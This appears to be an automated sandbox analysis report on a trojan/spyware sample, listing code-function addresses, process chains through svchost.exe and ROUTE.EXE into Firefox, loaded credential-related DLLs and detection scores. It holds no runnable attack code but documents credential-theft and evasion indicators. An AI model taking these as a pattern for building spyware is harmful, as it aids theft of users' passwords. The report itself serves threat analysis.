                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035003E62_2_035003E6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E02742_2_034E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C02C02_2_034C02C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C81582_2_034C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034301002_2_03430100
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DA1182_2_034DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F81CC2_2_034F81CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F41A22_2_034F41A2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035001AA2_2_035001AA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D20002_2_034D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034647502_2_03464750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034407702_2_03440770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343C7C02_2_0343C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345C6E02_2_0345C6E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034405352_2_03440535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035005912_2_03500591
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F24462_2_034F2446
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E44202_2_034E4420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034EE4F62_2_034EE4F6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FAB402_2_034FAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F6BD72_2_034F6BD7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343EA802_2_0343EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034569622_2_03456962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034429A02_2_034429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0350A9A62_2_0350A9A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344A8402_2_0344A840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034428402_2_03442840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E8F02_2_0346E8F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034268B82_2_034268B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B4F402_2_034B4F40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03482F282_2_03482F28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03460F302_2_03460F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E2F302_2_034E2F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03432FC82_2_03432FC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344CFE02_2_0344CFE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BEFA02_2_034BEFA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440E592_2_03440E59
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FEE262_2_034FEE26
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FEEDB2_2_034FEEDB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03452E902_2_03452E90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FCE932_2_034FCE93
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344AD002_2_0344AD00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DCD1F2_2_034DCD1F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343ADE02_2_0343ADE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03458DBF2_2_03458DBF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440C002_2_03440C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03430CF22_2_03430CF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0CB52_2_034E0CB5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342D34C2_2_0342D34C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F132D2_2_034F132D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0348739A2_2_0348739A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345B2C02_2_0345B2C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E12ED2_2_034E12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034452A02_2_034452A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0347516C2_2_0347516C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342F1722_2_0342F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0350B16B2_2_0350B16B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344B1B02_2_0344B1B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034EF0CC2_2_034EF0CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034470C02_2_034470C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F70E92_2_034F70E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FF0E02_2_034FF0E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FF7B02_2_034FF7B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034856302_2_03485630
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F16CC2_2_034F16CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F75712_2_034F7571
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035095C32_2_035095C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DD5B02_2_034DD5B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034314602_2_03431460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FF43F2_2_034FF43F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FFB762_2_034FFB76
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B5BF02_2_034B5BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0347DBF92_2_0347DBF9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345FB802_2_0345FB80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FFA492_2_034FFA49
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F7A462_2_034F7A46
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B3A6C2_2_034B3A6C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034EDAC62_2_034EDAC6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DDAAC2_2_034DDAAC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03485AA02_2_03485AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E1AA32_2_034E1AA3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034499502_2_03449950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345B9502_2_0345B950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D59102_2_034D5910
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AD8002_2_034AD800
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034438E02_2_034438E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FFF092_2_034FFF09
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03441F922_2_03441F92
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FFFB12_2_034FFFB1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03449EB02_2_03449EB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03443D402_2_03443D40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F1D5A2_2_034F1D5A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F7D732_2_034F7D73
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345FDC02_2_0345FDC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B9C322_2_034B9C32
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FFCF22_2_034FFCF2
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_032DA3527_2_032DA352
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_032E03E67_2_032E03E6
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_0322E3F07_2_0322E3F0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_032C02747_2_032C0274
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_032A02C07_2_032A02C0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_032101007_2_03210100
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_032BA1187_2_032BA118
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_032A81587_2_032A8158
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_032E01AA7_2_032E01AA
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_032D41A27_2_032D41A2
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_032D81CC7_2_032D81CC
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_032B20007_2_032B2000
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_032207707_2_03220770
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_032447507_2_03244750
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_0321C7C07_2_0321C7C0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_0323C6E07_2_0323C6E0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_032205357_2_03220535
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_032E05917_2_032E0591
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_032C44207_2_032C4420
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_032D24467_2_032D2446
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_032CE4F67_2_032CE4F6
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_032DAB407_2_032DAB40
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_032D6BD77_2_032D6BD7
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_0321EA807_2_0321EA80
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_032369627_2_03236962
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_032229A07_2_032229A0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_032EA9A67_2_032EA9A6
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_032228407_2_03222840
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_0322A8407_2_0322A840
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_032068B87_2_032068B8
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_0324E8F07_2_0324E8F0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_03262F287_2_03262F28
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_03240F307_2_03240F30
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_032C2F307_2_032C2F30
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_03294F407_2_03294F40
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_0329EFA07_2_0329EFA0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_0322CFE07_2_0322CFE0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_03212FC87_2_03212FC8
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_032DEE267_2_032DEE26
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_03220E597_2_03220E59
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_03232E907_2_03232E90
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_032DCE937_2_032DCE93
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_032DEEDB7_2_032DEEDB
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_0322AD007_2_0322AD00
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_032BCD1F7_2_032BCD1F
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_03238DBF7_2_03238DBF
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_0321ADE07_2_0321ADE0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_03220C007_2_03220C00
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_032C0CB57_2_032C0CB5
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_03210CF27_2_03210CF2
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_032D132D7_2_032D132D
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_0320D34C7_2_0320D34C
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_0326739A7_2_0326739A
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_032252A07_2_032252A0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_032C12ED7_2_032C12ED
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_0323B2C07_2_0323B2C0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_032EB16B7_2_032EB16B
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_0325516C7_2_0325516C
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_0320F1727_2_0320F172
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_0322B1B07_2_0322B1B0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_032D70E97_2_032D70E9
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_032DF0E07_2_032DF0E0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_032CF0CC7_2_032CF0CC
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_032270C07_2_032270C0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_032DF7B07_2_032DF7B0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_032656307_2_03265630
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_032D16CC7_2_032D16CC
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_032D75717_2_032D7571
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_032BD5B07_2_032BD5B0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_032E95C37_2_032E95C3
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_032DF43F7_2_032DF43F
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_032114607_2_03211460
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_032DFB767_2_032DFB76
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_0323FB807_2_0323FB80
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_03295BF07_2_03295BF0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_0325DBF97_2_0325DBF9
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_03293A6C7_2_03293A6C
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_032DFA497_2_032DFA49
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_032D7A467_2_032D7A46
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_03265AA07_2_03265AA0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_032BDAAC7_2_032BDAAC
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_032C1AA37_2_032C1AA3
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_032CDAC67_2_032CDAC6
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_032B59107_2_032B5910
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_032299507_2_03229950
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_0323B9507_2_0323B950
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_0328D8007_2_0328D800
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_032238E07_2_032238E0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_032DFF097_2_032DFF09
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_032DFFB17_2_032DFFB1
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_03221F927_2_03221F92
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_03229EB07_2_03229EB0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_032D7D737_2_032D7D73
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_03223D407_2_03223D40
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_032D1D5A7_2_032D1D5A
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_0323FDC07_2_0323FDC0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_03299C327_2_03299C32
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_032DFCF27_2_032DFCF2
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_00731A007_2_00731A00
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_0072C8D07_2_0072C8D0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_0072C8C77_2_0072C8C7
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_0072CAF07_2_0072CAF0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_0072AB007_2_0072AB00
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_0072AC507_2_0072AC50
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_0072AC447_2_0072AC44
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_007350C07_2_007350C0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_007332C07_2_007332C0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_007332BC7_2_007332BC
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_007213927_2_00721392
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_0074B7A07_2_0074B7A0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_02F9525C7_2_02F9525C
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_02F8E3177_2_02F8E317
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_02F8E1F67_2_02F8E1F6
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_02F8E6AC7_2_02F8E6AC
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_02F8D7787_2_02F8D778
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_02F8CA187_2_02F8CA18
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 034BF290 appears 105 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 034AEA12 appears 86 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0342B970 appears 280 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03475130 appears 58 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03487E54 appears 110 times
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: String function: 03255130 appears 58 times
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: String function: 0328EA12 appears 86 times
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: String function: 03267E54 appears 110 times
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: String function: 0320B970 appears 280 times
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: String function: 0329F290 appears 105 times
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exeCode function: String function: 00CF8900 appears 42 times
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exeCode function: String function: 00CD7DE1 appears 35 times
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exeCode function: String function: 00CF0AE3 appears 70 times
                Source: gH3LlhcRzg.exe, 00000000.00000003.1393028845.0000000003BF3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs gH3LlhcRzg.exe
                Source: gH3LlhcRzg.exe, 00000000.00000003.1394032558.0000000003D9D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs gH3LlhcRzg.exe
                Source: gH3LlhcRzg.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/3@16/9
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exeCode function: 0_2_00D3A06A GetLastError,FormatMessageW,0_2_00D3A06A
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exeCode function: 0_2_00D281CB AdjustTokenPrivileges,CloseHandle,0_2_00D281CB
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exeCode function: 0_2_00D287E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_00D287E1
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exeCode function: 0_2_00D3B3FB SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_00D3B3FB
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exeCode function: 0_2_00D4EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_00D4EE0D
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exeCode function: 0_2_00D3C397 CoInitialize,CoCreateInstance,CoUninitialize,0_2_00D3C397
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exeCode function: 0_2_00CD4E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00CD4E89
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exeFile created: C:\Users\user\AppData\Local\Temp\aut9649.tmpJump to behavior
                Source: gH3LlhcRzg.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: ROUTE.EXE, 00000007.00000003.1899061498.0000000002CEB000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000007.00000002.3226358408.0000000002D0E000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000007.00000003.1896844844.0000000002CE0000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000007.00000002.3226358408.0000000002CE0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: gH3LlhcRzg.exeVirustotal: Detection: 36%
                Source: gH3LlhcRzg.exeReversingLabs: Detection: 91%
                Source: unknownProcess created: C:\Users\user\Desktop\gH3LlhcRzg.exe "C:\Users\user\Desktop\gH3LlhcRzg.exe"
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\gH3LlhcRzg.exe"
                Source: C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exeProcess created: C:\Windows\SysWOW64\ROUTE.EXE "C:\Windows\SysWOW64\ROUTE.EXE"
                Source: C:\Windows\SysWOW64\ROUTE.EXEProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\gH3LlhcRzg.exe"Jump to behavior
                Source: C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exeProcess created: C:\Windows\SysWOW64\ROUTE.EXE "C:\Windows\SysWOW64\ROUTE.EXE"Jump to behavior
                Source: C:\Windows\SysWOW64\ROUTE.EXEProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exeSection loaded: wininet.dllJump to behavior
